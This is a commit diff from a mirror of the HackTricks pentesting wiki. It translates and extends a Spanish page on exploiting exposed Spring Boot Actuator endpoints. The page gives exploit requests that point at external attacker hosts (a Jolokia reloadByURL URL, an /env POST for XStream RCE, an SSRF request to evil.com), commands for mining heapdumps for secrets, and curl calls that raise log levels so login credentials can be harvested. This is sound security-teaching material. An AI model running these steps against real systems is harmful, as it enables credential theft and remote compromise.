maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/network-services-pentesting/pentesting-web/spring-a

Browse Source
This commit is contained in:
Translator 2025-09-03 16:48:55 +00:00
parent 12f2218d51
commit 453f3fb1cb
2 changed files with 396 additions and 275 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

543
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

128
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -1,4 +1,4 @@
# Spring Actuators
# Actuadores de Spring
{{#include ../../banners/hacktricks-training.md}}
@ -6,30 +6,30 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**Desde** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Explotando Spring Boot Actuators
## Explotando Actuadores de Spring Boot
**Consulta la publicación original en** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Puntos Clave:**
### **Puntos clave:**
- Spring Boot Actuators registra endpoints como `/health`, `/trace`, `/beans`, `/env`, etc. En las versiones 1 a 1.4, estos endpoints son accesibles sin autenticación. A partir de la versión 1.5, solo `/health` y `/info` son no sensibles por defecto, pero los desarrolladores a menudo desactivan esta seguridad.
- Ciertos endpoints de Actuator pueden exponer datos sensibles o permitir acciones dañinas:
- Los Actuadores de Spring Boot registran endpoints como `/health`, `/trace`, `/beans`, `/env`, etc. En las versiones 1 a 1.4, estos endpoints son accesibles sin autenticación. Desde la versión 1.5 en adelante, por defecto solo `/health` y `/info` no son sensibles, pero los desarrolladores a menudo desactivan esta seguridad.
- Algunos endpoints de actuadores pueden exponer datos sensibles o permitir acciones dañinas:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, y `/heapdump`.
- En Spring Boot 1.x, los actuadores se registran bajo la URL raíz, mientras que en 2.x, están bajo la ruta base `/actuator/`.
- En Spring Boot 1.x, los actuadores se registran bajo la URL raíz, mientras que en 2.x están bajo la ruta base `/actuator/`.
### **Técnicas de Explotación:**
### **Técnicas de explotación:**
1. **Ejecución de Código Remoto a través de '/jolokia'**:
- El endpoint del actuador `/jolokia` expone la Biblioteca Jolokia, que permite el acceso HTTP a MBeans.
- La acción `reloadByURL` puede ser explotada para recargar configuraciones de registro desde una URL externa, lo que puede llevar a XXE ciego o Ejecución de Código Remoto a través de configuraciones XML manipuladas.
- URL de ejemplo para explotación: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Modificación de Configuración a través de '/env'**:
1. **Remote Code Execution via '/jolokia'**:
- El endpoint de actuator `/jolokia` expone la Jolokia Library, que permite acceso HTTP a MBeans.
- La acción `reloadByURL` puede explotarse para recargar configuraciones de logging desde una URL externa, lo que puede conducir a blind XXE o Remote Code Execution vía configuraciones XML manipuladas.
- Example exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Config Modification via '/env'**:
- Si las Bibliotecas de Spring Cloud están presentes, el endpoint `/env` permite la modificación de propiedades ambientales.
- Las propiedades pueden ser manipuladas para explotar vulnerabilidades, como la vulnerabilidad de deserialización de XStream en el Eureka serviceURL.
- Ejemplo de solicitud POST para explotación:
- Si están presentes las librerías de Spring Cloud, el endpoint `/env` permite la modificación de propiedades de entorno.
- Las propiedades pueden manipularse para explotar vulnerabilidades, como la vulnerabilidad de deserialización de XStream en la serviceURL de Eureka.
- Example exploit POST request:
```
POST /env HTTP/1.1
@ -40,25 +40,101 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Otras Configuraciones Útiles**:
- Propiedades como `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, y `spring.datasource.tomcat.max-active` pueden ser manipuladas para varios exploits, como inyección SQL o alteración de cadenas de conexión a la base de datos.
3. **Other Useful Settings**:
- Propiedades como `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, y `spring.datasource.tomcat.max-active` pueden manipularse para varios exploits, como SQL injection o alterar cadenas de conexión a bases de datos.
### **Información Adicional:**
### **Información adicional:**
- Una lista completa de actuadores por defecto se puede encontrar [aquí](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- El endpoint `/env` en Spring Boot 2.x utiliza formato JSON para la modificación de propiedades, pero el concepto general sigue siendo el mismo.
- Una lista completa de actuadores por defecto puede encontrarse [aquí](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- El endpoint `/env` en Spring Boot 2.x usa formato JSON para la modificación de propiedades, pero el concepto general sigue siendo el mismo.
### **Temas Relacionados:**
### **Temas relacionados:**
1. **Env + H2 RCE**:
- Los detalles sobre la explotación de la combinación del endpoint `/env` y la base de datos H2 se pueden encontrar [aquí](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
- Detalles sobre la explotación de la combinación del endpoint `/env` y la base de datos H2 pueden encontrarse [aquí](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF en Spring Boot a través de la Interpretación Incorrecta de Nombres de Ruta**:
- El manejo de parámetros de matriz (`;`) en nombres de ruta HTTP por parte del marco de Spring puede ser explotado para Server-Side Request Forgery (SSRF).
- Ejemplo de solicitud de explotación:
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- El manejo por parte del framework Spring de los matrix parameters (`;`) en pathnames HTTP puede explotarse para Server-Side Request Forgery (SSRF).
- Example exploit request:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
## HeapDump secrets mining (credentials, tokens, internal URLs)
Si `/actuator/heapdump` está expuesto, normalmente puedes obtener un snapshot completo del heap de la JVM que frecuentemente contiene secretos en vivo (credenciales DB, API keys, Basic-Auth, URLs de servicios internos, mapas de propiedades de Spring, etc.).
- Descargar y triage rápido:
```bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
```
- Análisis más profundo con VisualVM y OQL:
- Abre el heapdump en VisualVM, inspecciona instancias de `java.lang.String` o ejecuta OQL para buscar secretos:
```
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
- Extracción automatizada con JDumpSpider:
```bash
java -jar JDumpSpider-*.jar heapdump
```
Hallazgos típicos de alto valor:
- Objetos Spring `DataSourceProperties` / `HikariDataSource` que exponen `url`, `username`, `password`.
- Entradas `OriginTrackedMapPropertySource` que revelan `management.endpoints.web.exposure.include`, puertos de servicio y Basic-Auth embebido en URLs (p. ej., Eureka `defaultZone`).
- Fragmentos planos de requests/responses HTTP incluyendo `Authorization: Basic ...` capturados en memoria.
Consejos:
- Usa una wordlist enfocada en Spring para descubrir endpoints de actuator rápidamente (p. ej., SecLists spring-boot.txt) y comprueba siempre si `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env` y `/actuator/configprops` también están expuestos.
- Las credenciales extraídas del heapdump a menudo funcionan para servicios adyacentes y a veces para usuarios del sistema (SSH), así que pruebalas ampliamente.
## Abusing Actuator loggers/logging to capture credentials
Si `management.endpoints.web.exposure.include` lo permite y `/actuator/loggers` está expuesto, puedes aumentar dinámicamente los niveles de log a DEBUG/TRACE para paquetes que manejan autenticación y procesamiento de requests. Combinado con logs legibles (vía `/actuator/logfile` o rutas de logs conocidas), esto puede leak credenciales enviadas durante flujos de login (p. ej., cabeceras Basic-Auth o parámetros de formularios).
- Enumerar y subir loggers sensibles:
```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
```
- Encuentra dónde se escriben los logs y extrae:
```bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
- Genera tráfico de login/autenticación y analiza el log en busca de credenciales. En setups de microservicios con un gateway delante del auth, habilitar TRACE para paquetes de gateway/security frecuentemente hace visibles las cabeceras y cuerpos de formularios. Algunos entornos incluso generan tráfico de login sintético periódicamente, haciendo la recolección trivial una vez que el logging es verboso.
Notas:
- Restaura los niveles de log cuando termines: `POST /actuator/loggers/<logger>` con `{ "configuredLevel": null }`.
- Si `/actuator/httpexchanges` está expuesto, también puede mostrar metadata reciente de requests que puede incluir cabeceras sensibles.
## References
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
- [VisualVM](https://visualvm.github.io/)
- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
- [0xdf HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
{{#include ../../banners/hacktricks-training.md}}